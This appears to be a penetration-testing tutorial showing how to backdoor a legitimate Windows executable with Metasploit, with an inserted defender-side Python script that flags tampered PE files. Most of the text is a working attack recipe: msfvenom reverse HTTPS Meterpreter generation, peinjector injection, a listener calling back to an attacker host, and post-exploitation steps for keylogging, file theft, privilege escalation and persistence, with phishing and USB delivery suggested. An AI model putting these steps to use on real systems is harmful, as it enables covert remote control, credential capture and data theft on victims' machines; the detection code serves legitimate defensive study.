Metasploit: Injecting a Payload into a Windows Executable for Backdoor Access
Introduction:
Metasploit is one of the most powerful tools in the arsenal of a penetration tester. Its capability to automate attacks, exploit vulnerabilities, and provide a reliable framework for post-exploitation activities is unparalleled. Among its many features, one advanced technique that stands out is the ability to inject a payload into a legitimate executable file. This method enables attackers to create backdoors within trusted applications, allowing them to maintain stealthy and persistent access to compromised systems.
In this article, we will explore the process of injecting a payload into a legitimate executable, focusing on the usage of Metasploit's peinjector module. We will cover everything from payload generation to exploiting the system and executing post-exploitation commands, ensuring the reader gains a comprehensive understanding of each step in the process.
Table of Contents:
- Lab Setup
- Generating the Payload with msfvenom
- Uploading the Executable to the Victim’s System
- Injecting the Payload using the peinjector Module
- Establishing Meterpreter Access
- Post-Exploitation Techniques
- Conclusion
1. Lab Setup
To begin, ensure that you have the following environment set up:
- Attacker Machine (Pentesting Machine): A machine running Kali Linux or any other platform equipped with Metasploit.
- Victim Machine (Target Machine): A Windows 10 or any Windows-based machine, which will serve as the target for the exploit.
Ensure both systems are on the same network or are otherwise able to communicate for the reverse shell to be effective.
Required Tools:
- Metasploit Framework: The backbone of the attack.
- msfvenom: A powerful payload generator that creates custom executables.
- peinjector Module: Used to inject payloads into legitimate executables.
2. Generating the Payload with msfvenom
The first step is generating the payload that will be injected into the executable. In our case, we will generate a reverse HTTPS Meterpreter shell, which is designed to connect back to the attacker’s machine when executed by the victim.
To generate the payload using msfvenom, run the following command on your attacker machine:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=443 -f exe -o payload.exe
Let’s break down the components of this command:
- -p windows/meterpreter/reverse_https: Specifies the payload type. In this case, a Meterpreter reverse HTTPS payload designed for Windows.
- LHOST=192.168.1.2: This is the attacker's IP address. The victim machine will attempt to connect to this IP for the reverse shell.
- LPORT=443: The port number on which the attacker will listen for incoming connections from the victim.
- -f exe: Specifies that the payload should be generated as a Windows executable file.
- -o payload.exe: Output file name for the generated payload.
After running this command, a file named payload.exe will be created on your machine. This file is the malicious payload, which will be injected into a legitimate application.
3. Uploading the Executable to the Victim’s System
With the payload generated, we now need to upload a commonly used executable to the victim machine. This executable should appear innocent to the user to maximize the likelihood of the victim running it without suspicion.
For the sake of this tutorial, let’s assume the victim’s machine has downloaded a common application executable, someapp.exe, which is located in the victim's Downloads folder. In a real-world attack, you might upload the executable via social engineering tactics, phishing, or a file transfer method like SMB, RDP, or through a malicious USB.
Once the file is uploaded to the victim’s system, ensure that the path to the executable is noted, as this will be required when performing the payload injection.
4. Injecting the Payload using the peinjector Module
The next step is to inject the malicious payload into the legitimate executable. We will use Metasploit’s peinjector module for this process. The peinjector module is specifically designed to inject a payload into an existing Portable Executable (PE) file, such as .exe files, without altering the outward appearance of the file.
Here’s the step-by-step guide for using the peinjector module:
- Start Metasploit: Launch the Metasploit framework on your attacker machine.
msfconsole
- Select the peinjector module: Use the post/windows/manage/peinjector module, which handles payload injection.
msf6 > use post/windows/manage/peinjector
- Set the target executable: Specify the path to the legitimate executable file that you want to inject the payload into. This is the file located on the victim's system.
msf6 post(windows/manage/peinjector) > set targetpe C:\\Users\\Geek-Institute\\Downloads\\someapp.exe
- Set the session ID: This is the active Meterpreter session through which the attack will be executed.
msf6 post(windows/manage/peinjector) > set session 1
- Configure LHOST and LPORT: These values correspond to the attacker’s IP address and port number, which were used during the payload generation.
msf6 post(windows/manage/peinjector) > set lhost 192.168.1.2
msf6 post(windows/manage/peinjector) > set lport 443
- Inject the payload: Finally, execute the module to inject the payload into the target executable.
msf6 post(windows/manage/peinjector) > exploit
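A defender-side check for the kind of file modification this section describes, added here as an example and not code from the original article or from Metasploit: it parses the PE section table and reports a section that is both writable and executable, or an entry point redirected into a trailing non-.text section. These are heuristics for a tampered PE, not a signature for peinjector, and the two PE images are constructed header-only test data rather than real binaries.

```python
import struct

# Section characteristic flags from the PE/COFF specification
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"  # 40-byte IMAGE_SECTION_HEADER

def parse_pe(data: bytes):  # -> (entry_rva, [(name, vaddr, vsize, flags), ...])
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[:2] != b"MZ" or data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]   # SizeOfOptionalHeader
    entry = struct.unpack_from("<I", data, pe_off + 40)[0]      # AddressOfEntryPoint
    sec_off = pe_off + 24 + opt_size                            # first section header
    secs = []
    for i in range(nsec):
        f = struct.unpack_from(SECTION_HDR, data, sec_off + 40 * i)
        secs.append((f[0].rstrip(b"\0").decode("ascii", "replace"), f[2], f[1], f[9]))
    return entry, secs

def pe_findings(data: bytes):  # heuristic indicators of an added/redirected code section
    entry, secs = parse_pe(data)
    findings = []
    for name, vaddr, vsize, flags in secs:
        if flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {name} is writable and executable")
    hit = next((s for s in secs if s[1] <= entry < s[1] + s[2]), None)
    if hit is None:
        findings.append("entry point lies outside every section")
    elif not hit[3] & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry point is in non-executable section {hit[0]}")
    elif hit is secs[-1] and len(secs) > 1 and hit[0] != ".text":
        findings.append(f"entry point redirected to last section {hit[0]}")
    return findings

def build_pe(sections, entry_rva: int) -> bytes:  # constructed header-only PE32 for testing
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)            # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 96, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva).ljust(96, b"\0")
    hdrs = b"".join(struct.pack(SECTION_HDR, n.encode().ljust(8, b"\0"), vs, va, 0, 0, 0, 0, 0, 0, fl)
                    for n, va, vs, fl in sections)
    return dos + b"PE\0\0" + coff + opt + hdrs

TEXT = (".text", 0x1000, 0x2000, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
DATA = (".data", 0x3000, 0x1000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
CLEAN = build_pe([TEXT, DATA], 0x1200)                          # entry inside .text
TAMPERED = build_pe([TEXT, DATA, (".inj", 0x4000, 0x200, TEXT[3] | IMAGE_SCN_MEM_WRITE)], 0x4000)
```

Run pe_findings over a known-good copy and the copy found in the Downloads folder; an empty result for the clean file and two findings for the modified one is the expected pattern, and a hash comparison against the vendor's original remains the more reliable check.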
5. Establishing Meterpreter Access
Once the payload has been injected, it’s time to establish a listener on the attacker’s machine to handle the reverse connection initiated by the victim when they execute the modified executable.
- Set up the multi/handler: The multi/handler module in Metasploit is used to handle incoming connections from the victim's machine.
msf6 > use exploit/multi/handler
- Configure the payload: Set the payload type to match the one used earlier (windows/meterpreter/reverse_https).
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
- Set the LHOST and LPORT: Use the same IP address and port that were used during payload generation and injection.
msf6 exploit(multi/handler) > set lhost 192.168.1.2
msf6 exploit(multi/handler) > set lport 443
- Start the listener: Finally, initiate the listener to await the incoming connection from the victim’s machine.
msf6 exploit(multi/handler) > exploit
6. Post-Exploitation Techniques
With a Meterpreter session open, you now have full control over the victim's system. Below are some of the most commonly used post-exploitation commands in Meterpreter.
- System Information: Use the sysinfo command to gather basic system information about the victim's machine.
meterpreter > sysinfo
- User Information: Check the currently logged-in user with the getuid command.
meterpreter > getuid
- Running Processes: List all running processes on the victim machine, useful for finding active applications or services.
meterpreter > ps
- Keylogging: Start keylogging to capture keystrokes typed by the victim.
meterpreter > run post/windows/capture/keyboard
- File Upload/Download:
  - Upload a file to the victim’s machine:
meterpreter > upload /path/to/local/file C:\\Users\\Geek-Institute\\Desktop
  - Download a file from the victim’s machine:
meterpreter > download C:\\Users\\Geek-Institute\\Documents\\important_file.txt
- Privilege Escalation: Attempt to elevate your privileges on the victim’s system using the getsystem command.
meterpreter > getsystem
- Persistence: Set up persistence to ensure that you retain access to the victim’s system even after a reboot.
meterpreter > run persistence -U -X -p 443 -r 192.168.1.2
7. Conclusion
Injecting a payload into a legitimate executable is a highly effective technique for penetration testers and attackers seeking to maintain persistent and undetectable access to a target system. Through the use of Metasploit’s msfvenom for payload creation and the peinjector module for payload injection, we demonstrated how to craft a sophisticated attack that remains hidden under the guise of a trusted application.